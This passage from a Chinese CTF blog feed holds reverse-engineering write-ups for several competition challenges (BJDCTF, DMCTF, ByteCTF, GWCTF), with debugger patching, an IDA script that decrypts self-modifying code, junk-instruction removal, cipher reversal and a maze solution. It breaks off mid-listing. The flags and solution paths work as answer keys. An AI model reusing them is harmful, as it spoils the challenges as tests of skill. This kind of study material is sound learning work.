srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113204849438"></p><p>我们动调修改那个数值:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205304364.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205304364.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113205304364"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205328521.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205328521.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113205328521"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag{[email protected]}</span><br></pre></td></tr></table></figure><h3 id="BJDCTF2020-easy"><a href="#BJDCTF2020-easy" class="headerlink" title="BJDCTF2020 easy"></a>BJDCTF2020 easy</h3><p>提示:和上一个题有异曲同工之妙……哦~</p><p>运行提示:<code>Can you find me?</code></p><p>为什么有一种莫名的做<code>pwn</code>的感觉……</p><p>既然让我们找,那我们就找找,<code>shift F12</code>,字符串没什么……</p><p>在函数表里面找找……<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205810179.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205810179.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113205810179"></p><p><code>C</code>语言里面应该没有叫做<code>ques</code>的函数吧<code>(ques,,,question???)</code>,看了看没有函数调用它……好家伙,这不就是<code>pwn</code>里面的<code>backdoor</code>函数么……</p><p>直接动调,随便修改一个指令为</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">call 0x401520</span><br></pre></td></tr></table></figure><p>这里建议修改<code>main</code>函数里面的内容,如果修改别的库函数,可能会有各种奇奇怪怪的问题……</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113215720899.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113215720899.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113215720899"></p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week2</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/</url>
<content type="html"><![CDATA[<h3 id="从-CNSS-偷来的-SMC"><a href="#从-CNSS-偷来的-SMC" class="headerlink" title="从 CNSS 偷来的 SMC"></a>从 CNSS 偷来的 SMC</h3><p>最早接触<code>SMC(Self Modify Code)</code>这个词语是在看《加密与解密》的时候看的。我印象中碰到的第一个<code>SMC</code>的题目是第二届全国中学生网络安全竞赛线上赛的一个<code>maze</code>题,它<code>smc</code>的内容是地图……那个题目比较简单,导致我认为<code>smc</code>很简单……然后我在今年的<code>SWUPCTF</code>里面被很很打脸,第一个<code>smc</code>直接不会。</p><p>这个题的<code>smc</code>感觉还是比较简单的(<code>bushi</code>,但是我一开始没做出来是因为我被<code>swup</code>的那个题目给影响了,直接全局找<code>vm</code>函数,在函数表里面没有找到,又往main函数前面手动查找,但是也没有找到,就不会了……直到前两天碰见<code>rx</code>神,谈到这个题,他说:垃圾<code>bb</code>,你知道什么是<code>NX</code>(堆栈不可执行)保护么????我留着屈辱的泪水,终于明白了。这个题的text有修改权限,不需要<code>vm</code>函数来修改权限。那么我在<code>main</code>函数里面找了找,终于找到了<code>smc</code>函数:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205530210.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205530210.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201224205530210"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205337596.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205337596.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201224205337596"></p><p>在<code>main</code>函数里面可以看到三个参数,写一下<code>ida_python</code>脚本(嫖<code>RX</code>的:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> ida_bytes <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x138</span>):</span><br><span class="line"> patch_byte(<span class="number">0x408b06</span>+i, get_byte(<span class="number">0x408b06</span>+i)^<span class="number">74</span>)</span><br></pre></td></tr></table></figure><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224211443049.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224211443049.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201224211443049"></p><p>好了,知道了……<code>maze</code>题,扣迷宫,手动走:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212041719.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212041719.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201224212041719"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212054162.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212054162.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201224212054162"></p><h3 id="ByteCTF-2020-AWD-TikTokAdmin-简单花指令"><a href="#ByteCTF-2020-AWD-TikTokAdmin-简单花指令" class="headerlink" title="ByteCTF 2020 AWD TikTokAdmin 简单花指令"></a>ByteCTF 2020 AWD TikTokAdmin 简单花指令</h3><p>这个题只是要求去花嘛~~,那直接在问题窗口里面找花就好了:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085406121.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085406121.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201226085406121"></p><p>两处花指令都是十分简单的那种</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">je loc_8125+1</span><br><span class="line">jnz loc_8125+1</span><br><span class="line"></span><br><span class="line">je loc_81f2+1</span><br><span class="line">jnz loc_81f2+1</span><br></pre></td></tr></table></figure><p>直接<code>patch</code>一下,然后p一下就好了。</p><h3 id="attachment"><a href="#attachment" class="headerlink" title="attachment"></a>attachment</h3><p>上周的第三题那个<code>C艹艹</code>逆向,思路很简单,但是那么多<code>dll</code>,反汇编哪一个???而且怎们知道是<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085221239.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085221239.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201226085221239"><br>这个事件里面……</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085141053.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085141053.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201226085141053">思路很简单,把“<code>DD01903921EA24941C26A48F2CEC24E0BB0E8CC7</code>”<code>SHA1</code>解密:<code>1001</code>,再<code>md5</code>加密:“<code>b8c37e33defde51cf91e1e03e51657da</code>”,然后再跟进<code>md5</code>那个加密函数:<br><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085152993.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085152993.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201226085152993">好家伙,取20位……<br><code>BJDCTF{b8c37e33defde51cf91e}</code></p><p>但还是最前面的两个问题很难受……不太懂</p><p>PS: </p><p> 那两个问题RX解答了,他的专业回复是这样的:看这里:<a href="https://docs.unity3d.com/Manual/ScriptCompilationAssemblyDefinitionFiles.html">Unity - Manual: Assembly definitions (unity3d.com)</a></p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week1</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/</url>
<content type="html"><![CDATA[<h3 id="DMCTF-2020-re1"><a href="#DMCTF-2020-re1" class="headerlink" title="DMCTF 2020 re1"></a>DMCTF 2020 re1</h3><p>名字叫来点简单的算法题……<code>Peid</code>查壳查算法,没查出来,进<code>IDA</code>。</p><p>定位<code>main</code>函数,重命名,一气呵成:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208113709778.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208113709778.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208113709778"></p><p>盲猜<code>sub_485D1A</code>里面嵌套了<code>strlen</code>,跟进去看看,应该差不多,<code>flag</code>长度要求<code>20</code>.</p><p>那就再进<code>sub_4849EC</code>看看;</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114054449.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114054449.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208114054449"></p><p>美化一下:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114221003.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114221003.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208114221003"></p><p>瞬间舒服多了……目测凯撒,直接上他:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">ans=[]</span><br><span class="line">a=[<span class="number">0x73</span>,<span class="number">0x65</span>,<span class="number">0x6D</span>,<span class="number">0x66</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x6D</span>,<span class="number">0x75</span>,<span class="number">0x7B</span>,<span class="number">0x68</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x76</span>,<span class="number">0x5F</span>,<span class="number">0x63</span>,<span class="number">0x6B</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x5F</span>,<span class="number">0x6E</span>,<span class="number">0x72</span>,<span class="number">0x6C</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x7D</span>,<span class="number">0x68</span>,<span class="number">0x6C</span>,<span class="number">0x67</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"> ans.append(i)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ans=[102, 109, 101, 115, 104, 123, 117, 109, 107, 99, 95, 118, 108, 114, 110, 95, 103, 108, 104, 125]</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ans:</span><br><span class="line"><span class="keyword">if</span> i>=<span class="built_in">ord</span>(<span class="string">'a'</span>) <span class="keyword">and</span> i<=<span class="built_in">ord</span>(<span class="string">'k'</span>):</span><br><span class="line">print(<span class="built_in">chr</span>(i-<span class="number">2</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">elif</span> i>=<span class="built_in">ord</span>(<span class="string">'o'</span>) <span class="keyword">and</span> i<=<span class="built_in">ord</span>(<span class="string">'y'</span>):</span><br><span class="line">print(<span class="built_in">chr</span>(i+<span class="number">1</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">elif</span> i==<span class="built_in">ord</span>(<span class="string">'l'</span>) <span class="keyword">or</span> i==<span class="built_in">ord</span>(<span class="string">'m'</span>):</span><br><span class="line">print(<span class="string">"("</span>,<span class="built_in">chr</span>(i-<span class="number">2</span>),<span class="built_in">chr</span>(i),<span class="string">")"</span>,end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">elif</span> i==<span class="built_in">ord</span>(<span class="string">'n'</span>):</span><br><span class="line">print(<span class="string">"("</span>,<span class="built_in">chr</span>(i),<span class="built_in">chr</span>(i+<span class="number">1</span>),<span class="string">")"</span>,end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># d( k m )ctf{v( k m )ia_w( j l )s( n o )_e( j l )f}</span></span><br></pre></td></tr></table></figure><p>这个题貌似就是多解……经<code>RX</code>验证……</p><h3 id="DMCTF-2020-re4"><a href="#DMCTF-2020-re4" class="headerlink" title="DMCTF 2020 re4"></a>DMCTF 2020 re4</h3><p><code>DIE</code>查壳……没结果,拖进<code>IDA</code>,查看字符串,定位<code>main</code>函数:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165837990.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165837990.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208165837990"></p><p>根据红框框,盲猜地图题。<br>扣地图:</p><blockquote><p>1 0 0 0 0 1 1 0 0 0<br>1 1 0 0 0 1 1 1 0 0<br>0 1 0 0 0 1 0 1 0 0<br>0 1 1 1 1 1 0 1 0 0<br>0 0 0 0 1 1 0 1 0 0<br>0 0 0 0 0 0 0 1 0 0<br>0 0 0 0 0 0 0 1 1 0<br>0 0 0 0 0 0 0 0 1 0<br>0 0 0 0 0 0 0 0 1 1<br>0 0 0 0 0 0 0 0 0 1 </p></blockquote><p>看逻辑:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165940558.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165940558.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208165940558"></p><p>手动走迷宫:</p><blockquote><p>sdssdddsdwwwwdsdsssssdssds<br>20220002033330202222202202</p></blockquote><p>执行一下:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208170029486.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208170029486.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201208170029486"></p><h3 id="GWCTF-2019-xxor"><a href="#GWCTF-2019-xxor" class="headerlink" title="GWCTF 2019 xxor"></a>GWCTF 2019 xxor</h3><p><code>DIE</code>查一下,没什么……拖进<code>IDA64</code>,<code>woc</code>惊喜!没扣符号表!!!</p><p>找到<code>main</code>函数,美化一下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int64 v6[<span class="number">6</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line"> __int64 v7[<span class="number">6</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line"> v7[<span class="number">5</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> v6[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)((<span class="keyword">char</span> *)v6 + <span class="number">4</span> * i);</span><br><span class="line"> 